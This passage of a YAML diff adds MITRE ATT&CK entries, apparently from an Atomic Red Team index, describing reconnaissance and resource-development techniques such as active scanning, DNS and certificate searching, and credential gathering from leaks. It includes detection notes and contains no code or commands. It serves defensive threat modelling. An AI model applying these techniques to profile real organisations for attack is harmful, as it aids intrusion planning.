+ Database. Retrieved October 15, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Vulnerabilities
+ description: |-
+ Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
+
+ An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).
+ id: attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-16T01:54:39.868Z'
+ created: '2020-10-15T02:59:38.628Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on behaviors relating to the potential use of exploits
+ for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190),
+ [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203),
+ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068),
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211),
+ [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212),
+ [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210),
+ and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.006
+ url: https://attack.mitre.org/techniques/T1583/006
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Services
+ description: Before compromising a victim, adversaries may register for web
+ services that can be used during targeting. A variety of popular websites
+ exist for adversaries to register for a web-based service that can be abused
+ during later stages of the adversary lifecycle, such as during Command and
+ Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration
+ Over Web Service](https://attack.mitre.org/techniques/T1567). Using common
+ services, such as those offered by Google or Twitter, makes it easier for
+ adversaries to hide in expected noise. By utilizing a web service, adversaries
+ can make it difficult to physically tie back operations to them.
+ id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:59:17.456Z'
+ created: '2020-10-01T00:50:29.936Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.006
+ url: https://attack.mitre.org/techniques/T1584/006
+ - source_name: Recorded Future Turla Infra 2020
+ url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
+ Tracking Turla Infrastructure. Retrieved October 20, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Services
+ description: 'Before compromising a victim, adversaries may compromise access
+ to third-party web services that can be used during targeting. A variety of
+ popular websites exist for legitimate users to register for web-based services,
+ such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take
+ ownership of a legitimate user''s access to a web service and use that web
+ service as infrastructure in support of cyber operations. Such web services
+ can be abused during later stages of the adversary lifecycle, such as during
+ Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation:
+ Recorded Future Turla Infra 2020) Using common services, such as those offered
+ by Google or Twitter, makes it easier for adversaries to hide in expected
+ noise. By utilizing a web service, particularly when access is stolen from
+ legitimate users, adversaries can make it difficult to physically tie back
+ operations to them.'
+ id: attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:02:30.304Z'
+ created: '2020-10-01T01:01:00.176Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+reconnaissance:
+ T1595:
+ technique:
+ id: attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b
+ description: |-
+ Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
+
+ Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ name: Active Scanning
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595
+ url: https://attack.mitre.org/techniques/T1595
+ - source_name: Botnet Scan
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ - source_name: OWASP Fingerprinting
+ url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
+ description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
+ October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:06:50.402Z'
+ created: '2020-10-02T16:53:16.526Z'
+ x_mitre_platforms:
+ - PRE
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ atomic_tests: []
+ T1591.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.002
+ url: https://attack.mitre.org/techniques/T1591/002
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Business Relationships
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:08:59.209Z'
+ created: '2020-10-02T16:27:55.713Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.004
+ url: https://attack.mitre.org/techniques/T1596/004
+ - source_name: DigitalShadows CDN
+ url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/
+ description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
+ Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
+ You Can Do About It. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: CDNs
+ description: |-
+ Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
+
+ Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).
+ id: attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:17:09.684Z'
+ created: '2020-10-02T16:59:56.648Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.004
+ url: https://attack.mitre.org/techniques/T1592/004
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Client Configurations
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:52:10.774Z'
+ created: '2020-10-02T16:47:16.719Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.001
+ url: https://attack.mitre.org/techniques/T1589/001
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ - source_name: Register Deloitte
+ url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
+ description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
+ Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
+ October 19, 2020.'
+ - source_name: Register Uber
+ url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
+ description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
+ into court to find who hacked database of 50,000 drivers. Retrieved October
+ 19, 2020.
+ - source_name: Detectify Slack Tokens
+ url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
+ description: Detectify. (2016, April 28). Slack bot token leakage exposing
+ business critical information. Retrieved October 19, 2020.
+ - source_name: Forbes GitHub Creds
+ url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud
+ Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
+ October 19, 2020.
+ - source_name: GitHub truffleHog
+ url: https://github.com/dxa4481/truffleHog
+ description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
+ 19, 2020.
+ - source_name: GitHub Gitrob
+ url: https://github.com/michenriksen/gitrob
+ description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open
+ Source in OSINT. Retrieved October 19, 2020.'
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Credentials
+ description: |-
+ Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+ Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-27T02:27:31.090Z'
+ created: '2020-10-02T14:55:43.815Z'
+ x_mitre_contributors:
+ - Vinayak Wadhwa, Lucideus
+ - Lee Christensen, SpecterOps
+ - Toby Kohlenberg
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.002
+ url: https://attack.mitre.org/techniques/T1590/002
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
+
+ Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:02:39.701Z'
+ created: '2020-10-02T15:47:10.102Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.001
+ url: https://attack.mitre.org/techniques/T1596/001
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS/Passive DNS
+ description: |-
+ Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
+
+ Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:19:40.584Z'
+ created: '2020-10-02T16:57:45.044Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.001
+ url: https://attack.mitre.org/techniques/T1591/001
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ - source_name: DOB Business Lookup
+ url: https://www.dobsearch.com/business-lookup/
+ description: Concert Technologies . (n.d.). Business Lookup - Company Name
+ Search. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Determine Physical Locations
+ description: |-
+ Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
+ id: attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:09:48.419Z'
+ created: '2020-10-02T16:32:33.126Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.003
+ url: https://attack.mitre.org/techniques/T1596/003
+ - source_name: SSLShopper Lookup
+ url: https://www.sslshopper.com/ssl-checker.html
+ description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.
+ - source_name: Medium SSL Cert
+ url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
+ description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
+ from Server (Site URL). Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
+
+ Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:19:15.289Z'
+ created: '2020-10-02T16:58:58.738Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.001
+ url: https://attack.mitre.org/techniques/T1590/001
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Properties
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
+
